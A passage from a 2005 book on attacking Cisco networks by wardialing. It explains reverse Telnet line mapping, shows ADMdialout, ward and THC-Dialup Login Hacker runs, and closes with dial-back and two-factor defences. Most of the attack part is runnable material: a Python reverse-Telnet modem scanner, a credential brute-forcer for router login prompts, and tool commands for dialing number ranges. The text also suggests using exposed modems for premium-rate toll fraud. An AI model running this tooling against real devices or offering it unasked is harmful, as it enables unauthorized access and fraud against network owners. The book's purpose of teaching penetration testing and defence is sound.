CISCO DEVICE WARDIALING

With the passage of time and the spread of fast Internet access technologies, the security community has started to forget the good old days of breaking into networks through the Plain Old Telephone Service (POTS). Old dial-in systems used for remote access into a company's internal infrastructure are being widely replaced with modern VPN technologies that offer reduced costs, greater speed, and added flexibility, but a great number of organizations are too slow, too bureaucratic, or see no practical need to switch to VPN.

Although wardialing is one of the oldest methods of gaining unauthorized access to targeted systems, it is one of the dangers most commonly forgotten by network engineers and system administrators, especially by those young enough to have never encountered remote dial-in access. A single improperly configured machine with a modem connected to a telephone line can make the whole perimeter defense useless.

Rather than launching a frontal assault, a hacker can sneak past all the expensive firewalls and IDS and head straight into the core of the network. Through wardialing, an attacker searches for devices in the target network infrastructure that are also accessible over a telephone line. You might question the relevance of wardialing to Cisco devices, until you remember that most Cisco hosts can communicate via modem. Before we get to how someone can abuse such a device, you need to know in which situations you are likely to find these devices and why such means of access exist.

Cisco Router Wardialing 101: Interfaces, Configurations, and Reverse Telnet

The three main reasons for attaching a modem to a Cisco router are remote access to the Cisco device itself, dial-on-demand, and dial backup.

Remote access is often required for a device stationed in a distant location, when physical access to the unit is troublesome or impossible. If something major goes wrong with the device, a remote out-of-band way of connecting to it and fixing the problem is available. Service companies often install dedicated lines to such equipment on the client site, so that administrators have an additional means of accessing it to perform maintenance, upgrades, or otherwise manage the device.

Dial-on-demand is commonly used to establish connectivity on an as-necessary basis, maintain it as long as required, and drop it when it is no longer needed. Dial-on-demand routing (DDR) is commonly found in networks where access to external resources is required on an occasional basis and the volume of the transferred data is low. It could also be a way to provide redundancy and traffic load balancing under a heavy load. Dial backup is most frequently found in networks where redundancy is necessary. Such an option is exercised in situations where a constant link exists between sites, but the dial-up option is kept on standby in case the main link goes down. In case of the fault, the system automatically initiates a dial-up connection so that the connectivity remains uninterrupted.

For dial-on-demand and dial backup, we are interested in situations where a router is configured not only to initiate a call but also to receive and answer one (the difference in the configuration being the modem inout command, which allows both directions, versus modem callout, which allows outgoing calls only).

One distinct feature of Cisco routers lets us identify devices that listen on their serial lines without actually doing any wardialing, thus saving time and money. To understand how this can be achieved, you need to understand how a Cisco router differentiates between its serial lines.

The possible line types are as follows :

  • auxN The router's auxiliary port, commonly used for modem backup connections

  • console The router's console port

  • ttyN The router's asynchronous port used for modem connections

  • vtyN The virtual terminals, the router's Telnet and rlogin connections

To make the matter a bit more complicated, two numbering notations are used: absolute and relative. In relative numbering each line type is counted separately (the console is con 0, the TTYs start at tty 1, the AUX port is aux 0, and the first virtual terminal is vty 0), while the absolute number is the line's position in the overall sequence. The following table shows the absolute/relative numbering scheme:

 Line    Absolute No.    Relative No.
 CTY     0               0
 TTY1    1               1
 TTY2    2               2
 TTYn    n               n
 AUX     n+1             0
 VTY0    n+2             0
 VTY1    n+3             1

On newer modular Cisco routers, the TTY numbering is different, since each module slot has a reserved block of TTY lines: slot 0 has reserved lines 1-32, slot 1 has reserved lines 33-64, and so on. So the absolute number of the AUX port on a router with two module slots would be 65.

Let's look at asynchronous ports (TTYs) and the auxiliary port in more detail. A TTY port directly corresponds to the asynchronous interface of the router to which the modem is connected. Note that when you configure the TTY port, you configure the hardware aspects of the connectivity between the port and the attached serial device. To configure the overlaying protocol, you need to configure the corresponding asynchronous interface. A typical configuration of a modem attached to TTY line 2 and set up for dial-in is shown here:

 line tty 2
  login local
  modem dialin
  modem autoconfigure discovery
  speed 115200
  flowcontrol hardware

The AUX port is typically configured as the asynchronous serial interface on routers without built-in asynchronous interfaces, or as a backup asynchronous port. It is also possible to configure it as a backup console port, but more often it is used for remote dial-in purposes. Compared with a normal asynchronous line it is much slower (older hardware supports only up to 38400 bps on the AUX port) and lacks some features, but would an attacker really moan and complain if he or she can get in this way?

A sample configuration of the AUX backup link looks like this:

 chat-script arh0nt ABORT ERROR ABORT BUSY "" "AT" OK "ATDT \T" TIMEOUT 45 CONNECT \c
 !
 dialer-list 1 protocol ip permit
 !
 interface Serial0/0
  ip address 192.168.30.202 255.255.255.0
  encapsulation ppp
  backup delay 10 1
  backup interface Async65
  no ip mroute-cache
 !
 interface Async65
  ip address 192.168.30.222 255.255.255.0
  dialer in-band
  dialer string 123456789
  dialer-group 1
  async dynamic routing
 !
 line aux 0
  script dialer arh0nt
  modem InOut

Once you have this set up under test conditions, try Telneting to the IP address of the Serial0/0 interface on port 2000 plus the absolute line number of the AUX port: port 2001 on a router where the AUX is line 1, or port 2065 for the two-slot router in the configuration above, where the AUX is line 65 (interface Async65). You'll see a prompt. By Telneting to one of these upper ports, the router redirects the request back out of the selected asynchronous line, the so-called reverse Telnet connection in Ciscospeak. When you connect to such a port, the router executes the login procedure for that line and connects the session to it. The mapping of the ports is straightforward: subtract 2000 from the Telnet port to get the absolute number of the line to which you are connected. The same rule applies to the AUX port; on a router with no TTY ports the AUX is line 1, so it always maps to port 2001. Additionally, you might want to check ports 4000+N and 6000+N. The former carries the raw data stream without Telnet negotiation and is usually used for sending data directly to a printer, while the latter is the same as port 2000+N except that it turns off carriage-return translation.

The enumeration of such devices is easily achieved with the excellent ADMdialout tool from the ADM crew ( http://www.adm.freelsd.net/ADM/ ):

 #arhontus / # ./ADMdialout
 ADMdialout by plaguez - reading from stdin
 192.168.66.202
 FOUND DIALUP host: 192.168.66.202 port: 2001 !

This tool tries to open a connection to the host sequentially on each port in the range 2001 to 2011 and sends a Hayes-compatible AT command; if it gets an OK response, the host is considered vulnerable, since no authentication is required to use the serial device connected to that line. What a great opportunity to use a modem remotely! You can even write a small shell script that connects to the host and dials out, so as to wardial in a foreign country without having to pay a huge phone bill. (Speaking of phone bills, you have most certainly come across premium-rate phone numbers where you are charged ridiculous amounts per minute. You get the idea of how a malicious hacker can make a bit of cash.)
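The following is an added example, not code from the book or from the ADM crew. It reproduces what the ADMdialout run above does (connect to 2000+N ports, send AT, treat an OK answer as an unauthenticated modem line) while also refusing the Telnet options an IOS line negotiates on connect, and it encodes the line-number arithmetic given earlier in this section as small functions. The host names, the fake line used by the self-test, and the 32-lines-per-slot rule for modular routers are assumptions taken from the text, not from any real device.

```python
"""Reverse-telnet modem probe (added example; not the book's or ADM's code)."""
import socket
import socketserver
import threading

IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251
ECHO = 1


def aux_absolute_line(tty_count, module_slots=0):
    """Absolute line number of the AUX port.

    Classic routers: AUX follows the last TTY (n+1). Modular routers reserve
    32 TTY lines per slot (slot 0: 1-32, slot 1: 33-64), so AUX = 32*slots+1.
    """
    return 32 * module_slots + 1 if module_slots else tty_count + 1


def reverse_telnet_port(absolute_line, base=2000):
    """Port for a line: 2000+N (Telnet), 4000+N (raw, printers),
    6000+N (Telnet without carriage-return translation)."""
    if base not in (2000, 4000, 6000):
        raise ValueError("base must be 2000, 4000 or 6000")
    return base + absolute_line


def _strip_telnet(data, sock):
    """Refuse every Telnet option the line offers and return the payload bytes."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == IAC and i + 2 < len(data):
            cmd, opt = data[i + 1], data[i + 2]
            if cmd == DO:
                sock.sendall(bytes([IAC, WONT, opt]))
            elif cmd == WILL:
                sock.sendall(bytes([IAC, DONT, opt]))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def probe_modem(host, port, timeout=5.0):
    """True if host:port hands us a modem that answers AT with OK without
    asking for a password; False on refusal, timeout or a password prompt."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            banner = b""
            try:
                banner = _strip_telnet(s.recv(1024), s)
            except socket.timeout:
                pass                      # a silent line is still worth an AT
            if b"assword" in banner:
                return False              # the line itself is password protected
            s.sendall(b"AT\r")
            reply = b""
            try:
                while b"OK" not in reply and b"ERROR" not in reply and len(reply) < 512:
                    chunk = s.recv(256)
                    if not chunk:
                        break
                    reply += _strip_telnet(chunk, s)
            except socket.timeout:
                pass
            return b"OK" in reply
    except OSError:
        return False


def scan_reverse_telnet(host, lines=range(1, 12), timeout=2.0):
    """ADMdialout-style sweep of ports 2001-2011; returns the open modem ports."""
    ports = [reverse_telnet_port(n) for n in lines]
    return [p for p in ports if probe_modem(host, p, timeout)]


class _FakeLine(socketserver.BaseRequestHandler):
    """Constructed test double for an IOS line: a bare modem that answers OK
    to AT, or (when the server has a password set) a line that asks for one."""

    def handle(self):
        sock = self.request
        sock.settimeout(3)
        if self.server.password:
            sock.sendall(b"\r\nPassword: ")
            return
        sock.sendall(bytes([IAC, WILL, ECHO]))   # an IOS line offers echo on connect
        buf = b""
        try:
            while b"\r" not in buf and len(buf) < 64:
                chunk = sock.recv(64)
                if not chunk:
                    return
                buf += chunk
        except socket.timeout:
            return
        sock.sendall(b"\r\nOK\r\n" if b"AT" in buf.upper() else b"\r\nERROR\r\n")


def start_fake_line(password=None):
    """Start a fake line on a random localhost port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _FakeLine)
    srv.daemon_threads = True
    srv.password = password
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_fake_line()
    if probe_modem("127.0.0.1", port):
        print("FOUND DIALUP host: 127.0.0.1 port: %d !" % port)
    srv.shutdown()
```

Run it against a router under test with scan_reverse_telnet("192.168.66.202") to sweep 2001-2011, or build the exact port for a known line with reverse_telnet_port(aux_absolute_line(0, module_slots=2)). The probe refuses every Telnet option rather than negotiating, which is what keeps the AT/OK exchange clean on an IOS line; a line that answers with a Password: prompt is reported as closed, not as a finding.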

Discovering the Numbers to Dial In

Attack

Popularity: 2
Simplicity: 9
Impact: 2
Risk Rating: 4

Moving back in time, let's pay more attention to "real" wardialing and the software available for it. Hacking networks through wardialing has been covered in great detail in other editions of Hacking Exposed. Although this book is about hacking Cisco networks, we will cover the wardialing software available for Linux, introducing our readers to the tools suitable for the job on the most famous Unix clone.

Although they have no fancy GUIs or huge databases of fingerprints of the responding devices or any other colorful options you might find in the commercial products, these tools are written with one purpose in mind: effectiveness.

One of the best and quickest wardialing scanners available is ward, a tool currently being developed and maintained by Marco Ivaldi. You can visit its homepage at http://www.0xdeadbeef.info ; the latest version at the time of writing is v2.3, released on January 22, 2005.

Once you download the source code, compile it with the following command (the math library goes after the source file, since some linkers discard a library named before the objects that need it):

 arh0ntus ward # gcc ward.c -o ward23 -lm

The tool should compile flawlessly. (If you get any error messages, write to raptor@0xdeadbeef.info for suggestions.)

 arh0ntus ward #./ward23 -h
 ward.c v2.3 - Fast wardialer for UNIX systems (PSTN/ISDN/GSM)
 Copyright (c) 2001-2005 Marco Ivaldi <raptor@0xdeadbeef.info>

 usage:
         ./ward23 [ [-g file] [-n nummask] ] [-r]   (generation mode)
         ./ward23 [-s file] [-t timeout] [-d dev]   (scanning mode)

 generation mode:
         -g  generate numbers list and save it to file
         -n  number mask to be used in generation mode
         -r  toggle random mode ON

 scanning mode:
         -s  scan a list of phone numbers from file
         -t  set the modem timeout (default=60secs)
         -d  use this device (default=/dev/modem)

 help:
         -h  print this help

The tool has two modes of operation. In generation mode, you create the list of numbers you want to check, which you later feed back into ward in scan mode. When you generate the list, it is advisable to specify the -r option to randomize the order of the phone numbers, so that the telco is less likely to identify sequential dialing from your landline as wardialing.

Caution 

Before executing any wardialing, be familiar with the attitude of your phone company toward such activities.

By executing the following command, you will generate a list of the 10,000 11-digit phone numbers that start with 0313371 (each x in the mask stands for one digit, so four of them give 10^4 numbers):

 arh0ntus ward #./ward23 -g hecisco-pn.txt -n 0313371xxxx -r 

You can feed the list into ward for immediate wardialing or split it into several parts to be dialed on different machines or by different instances of ward, providing you have several modems connected.

Once satisfied with the layout of the number file, feed it into ward, setting the timeout (the total time ward will spend on each phone number) and specifying the device to which the modem is connected:

 arh0ntus ward #./ward23 -s hecisco-pn.txt -t 30 -d /dev/ttyS0 

You can relax now and continue with other tasks, since wardialing is a rather time-consuming process, especially if you have a large list of numbers to go through.

All of ward's results are written back into the phone number file, so as ward continues its work you can monitor progress by watching that file change. Its format is similar to this:

 03133712679            -
 03133713370            CONNECT
 03133714050            -
 03133712287            UNSCANNED
 03133715449            UNSCANNED

The number file reflects the progress of the current session: numbers that haven't been scanned yet are marked UNSCANNED, so ward can safely be stopped and the session resumed another time.

Ward makes no attempt to tell whether the prompt presented belongs to a Cisco device, so you will have to go through the numbers that produced a CONNECT response and check the device type by hand. The current version of the tool is also incapable of distinguishing a data response from a fax response.

Getting into a Cisco Router or an Access Server

Attack

Popularity: 2
Simplicity: 9
Impact: 10
Risk Rating: 7

Identifying a device that gives you a prompt doesn't mean much. You can't be sure that this device is in fact the one you are looking for, or even that it belongs to the network you are determined to break into. As with every proper pentest, root is what really counts, so you have to gain access to this device. For the most part, the only option available when you come across a Cisco device is the boring old bruteforcing option, but that is what this chapter is really about. We described Telnet bruteforcing earlier, and nearly the same rules apply to bruteforcing dial-in devices, although the tools useful for this job are different and the whole process is painfully slow. So cut your standard usernames/passwords list in half and go on downloading THC-Dialup Login Hacker.

THC-Dialup Login Hacker is one of the few tools able to dial a specific number and try different username/password combinations against modem carriers. The tool was developed by Van Hauser of The Hacker's Choice (THC), and the latest version (1.1 as of this writing, released on June 25, 2003) can be downloaded from http://www.thc.org/download.php?t=r&f=login_hacker-1.1.tar.gz . It is in fact a collection of minicom scripts that are called and controlled from the main bash scripts, so to run it you need minicom and bash installed, both standard in every Linux distribution. The tool comes in two parts: the login_hacker part is responsible for detecting the login prompt and bruteforcing it, while ppp_check is used to verify the presence of a passwordless Point-to-Point Protocol (PPP) dial-in on the other end.

Let's have a look at which options are available:

 arh0ntus login_hacker-1.1 # ./login_hacker
 Modem Login Hacker v1.1 (c) 2003 by van Hauser / THC <vh@thc.org>

 Syntax:
   ./login_hacker PHONENUMBER type1 COLONFILE
   ./login_hacker PHONENUMBER type2 LOGINFILE PASSWORDFILE
   ./login_hacker PHONENUMBER type3 PASSWORDFILE
   ./login_hacker PHONENUMBER your_own_script INPUTFILE [INPUTFILE]

 Options:
   PHONENUMBER    number to call and try to break in
   LOGINFILE      input file with logins to try
   PASSWORDFILE   input file with passwords to try
   COLONFILE      input file with LOGIN:PASSWORD entries

 Types:
   type1+type2    should work against any login/password type modem prompts
   type3          should work against any password type modem prompts

 This script is really flexible, it works against Unix, Cisco, Shiva, ROLM
 PABX, Modem dialin password protection, and many, many more.
 Take a look in the README. Use allowed only for legal purposes!
 You can always find the newest version at http://www.thc.org

What catches your eye straightaway is the different modem prompt types. Type1 and type2 are used against exactly the same modem prompts; the only difference is that with the former you supply a colon-separated login:password list, while with the latter logins and passwords are supplied in two different files, so that for every login all passwords from the list will be tried. The type1 script works against prompts where access is granted upon presentation of a correct login and password pair, and it recognizes the following prompt sequences:

 Login: asdf
 Password:
 Login incorrect.
 Login:

 Username: asdf
 Password:
 % Authentication failed
 Username:

 Enter login name: asdf
 Enter login name: qwert
 Enter login name: admin
 password:

 @login: root
 password:
 password:
 password:

 Login: bin
 Welcome to system abc.
 Last login: never
 $

The login-plus-password prompts are found on Cisco routers where aaa new-model authentication is enabled. By contrast, the type3 scripts are used against standard password-only authentication and recognize the following prompt sequences:

 Password:
 Password:
 Password:
 % Bad passwords

 Enter password:
 Enter password:
 Enter password:

 PASSWORD> ####
 PASSWORD> ###
 PASSWORD> #######

 Password please: *****
 Password please: *****
 Password please: *****
 Invalid passwords, bye!

Between these two authentication schemes, the tool covers the whole range of IOS routers, access points, CatOS switches, and PIX OS firewalls. You can easily extend the set of recognized prompts by modifying the typeN.scr script file and adding more signatures.

The only other things you need to specify are the phone number of the host you are attacking and the login/password files with your favorite pairs. Once you supply this information, the minicom window appears and the bruteforcing process starts. Progress is shown in real time in the minicom window and saved to a logfile in the directory from which the tool was run.
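As an added example, not THC's code, the following shows the logic a login_hacker run encodes in its typeN.scr scripts: recognize login and password prompts and failure strings from the signature lists above, feed the next pair from a LOGIN:PASSWORD (type1) or cross-product (type2) list, and stop at a shell prompt. The modem session is replaced by a constructed in-memory Cisco line (FakeCiscoLine, with an assumed banner and prompt) so the code runs offline; on a real run, read() and write() would wrap the serial port instead.

```python
"""Prompt-driven credential check (added example; not THC's login_hacker)."""
import re

# Signatures from the prompt lists above; extend them the way typeN.scr is extended.
LOGIN_PROMPTS = ("Login:", "Username:", "Enter login name:", "@login:")
PASSWORD_PROMPTS = ("Password:", "password:", "Enter password:",
                    "PASSWORD>", "Password please:")
FAILURES = ("Login incorrect", "% Authentication failed",
            "% Bad passwords", "Invalid passwords")


def load_colon_file(text):
    """type1 COLONFILE: one LOGIN:PASSWORD entry per line."""
    return [tuple(line.split(":", 1)) for line in text.splitlines() if ":" in line]


def cross(logins, passwords):
    """type2: every password is tried for every login, in login order."""
    return [(l, p) for l in logins for p in passwords]


def classify(text):
    """Return (failed, prompt): failed is True if a failure string appeared in
    the chunk; prompt is the kind of prompt the chunk ends with, or None."""
    failed = any(f in text for f in FAILURES)
    tail = text.rstrip()
    if any(tail.endswith(p) for p in PASSWORD_PROMPTS):
        prompt = "PASSWORD"
    elif any(tail.endswith(p) for p in LOGIN_PROMPTS):
        prompt = "LOGIN"
    elif re.search(r"[$#>]$", tail) or "Welcome" in text or "Last login" in text:
        prompt = "SUCCESS"        # a shell/exec prompt or a post-login greeting
    else:
        prompt = None
    return failed, prompt


def try_credentials(session, creds, max_steps=200):
    """Walk creds against session; return the accepted (login, password) or None.
    For type3 (password-only) prompts pass pairs with an empty login."""
    creds = list(creds)
    idx = 0
    for _ in range(max_steps):
        text = session.read()
        if not text:
            if session.closed:
                return None
            continue
        failed, prompt = classify(text)
        if failed:
            idx += 1              # one failure string = one pair burned
        if idx >= len(creds):
            return None
        login, password = creds[idx]
        if prompt == "LOGIN":
            session.write(login + "\r")
        elif prompt == "PASSWORD":
            session.write(password + "\r")
        elif prompt == "SUCCESS" and not failed:
            return creds[idx]
    return None


class FakeCiscoLine:
    """Constructed stand-in for a dial-in IOS line with aaa new-model style
    Username:/Password: prompts (the Cisco sequence in the list above).
    The banner and exec prompt are assumptions, not captured output."""

    def __init__(self, username, password, prompt="Router>"):
        self._creds = (username, password)
        self._prompt = prompt
        self._out = "\r\nUser Access Verification\r\n\r\nUsername: "
        self._login = None
        self.attempts = 0
        self.closed = False

    def read(self):
        out, self._out = self._out, ""
        return out

    def write(self, data):
        line = data.rstrip("\r\n")
        if self._login is None:
            self._login = line
            self._out += "Password: "
            return
        self.attempts += 1
        if (self._login, line) == self._creds:
            self._out += "\r\n" + self._prompt
        else:
            self._out += "\r\n% Authentication failed\r\n\r\nUsername: "
        self._login = None


if __name__ == "__main__":
    pairs = load_colon_file("admin:admin\ncisco:cisco\nadmin:cisco\n")
    print(try_credentials(FakeCiscoLine("admin", "cisco"), pairs))
```

The driver advances to the next pair on every failure string it sees, not on every prompt, so a chunk that carries both "% Authentication failed" and the next "Username:" is handled in one step. Failure detection runs before prompt detection, which is why a password prompt such as PASSWORD> is never mistaken for the ">" of an exec prompt.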

The second part of the login hacker suite checks for passwordless dial-ins that use PPP. The only thing you need to supply to the script is the phone number you want to check; if your modem is not /dev/modem, you also have to open the script in an editor and change the path to the serial device you want to use (for example, /dev/ttyS0 is the first serial port on your computer). Once you are done, THC-Dialup Login Hacker dials the number and initiates the connection to the host. Upon successful negotiation you will see the PPP dial-up procedure, and if the PPP dial-in requires authentication, output like the following appears:

 Serial connection established.
 using channel 2
 Using interface ppp0
 Connect: ppp0 <--> /dev/ttyS0
 rcvd [LCP ConfReq id=0x1 <mru 1500> <asyncmap 0xa0000> <auth pap>
      <magic 0xa28e4641> <pcomp> <accomp> <mrru 1506>]
 sent [LCP ConfReq id=0x1 <asyncmap 0x0> <magic 0xada708b9> <pcomp> <accomp>]
 No auth is possible

Countermeasures for Wardialing Security

Countermeasure 

You can appeal to both common sense and the previous editions of Hacking Exposed: Network Security Secrets & Solutions for more general recommendations on how to protect yourself from those phreaky wardialers. We already covered possible security measures against user credential guessing when talking about Telnet and other services' bruteforcing.

Specifically with Cisco wardialing, we can offer two useful tips.

Use dial-back authentication, in which the router hangs up the incoming call after the caller identifies itself and dials back a predetermined telephone number. Unless the device is used to allow remote connections into the network by a large crowd of road-warrior users, this solution is feasible whenever both communicating parties' locations are known. Here's an example of a dial-back router configuration:

 username <username> callback-dialstring <number> password <password>
 username <username> callback-dialstring "" password <password>
 !
 chat-script <script name> ABORT ERROR ABORT BUSY "" "ATZ" OK "ATDT \T" TIMEOUT 30 CONNECT \c
 !
 interface Loopback0
  ip address <IP> <netmask>
  no ip directed-broadcast
 !
 interface Serial1/1
  no shutdown
  physical-layer async
  ip unnumbered Loopback0
  no ip directed-broadcast
  encapsulation ppp
  dialer in-band
  dialer hold-queue 2 timeout 30
  async mode interactive
  peer default ip address pool <pool name>
  no cdp enable
  ppp callback accept
  ppp authentication chap
 !
 ip local pool <pool name> <IP addresses>
 !
 line <line number>
  autoselect during-login
  autoselect ppp
  script callback <script name>
  login local
  modem InOut
  modem autoconfigure type usr_sportster
  transport input all
  callback forced-wait 30
  stopbits 1
  speed 115200
  flowcontrol hardware

Two-factor authentication mechanisms, such as hardware tokens or smartcards, are practical especially if you are managing a large pool of remotely connecting users. This can be done with a SecurID server together with TACACS+ or RADIUS. Such a mechanism relies on users possessing two authentication credentials, something the user has (a token) and something the user knows (a password), and is considered difficult to bypass.



Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions
ISBN: 0072259175
Year: 2005
Pages: 117
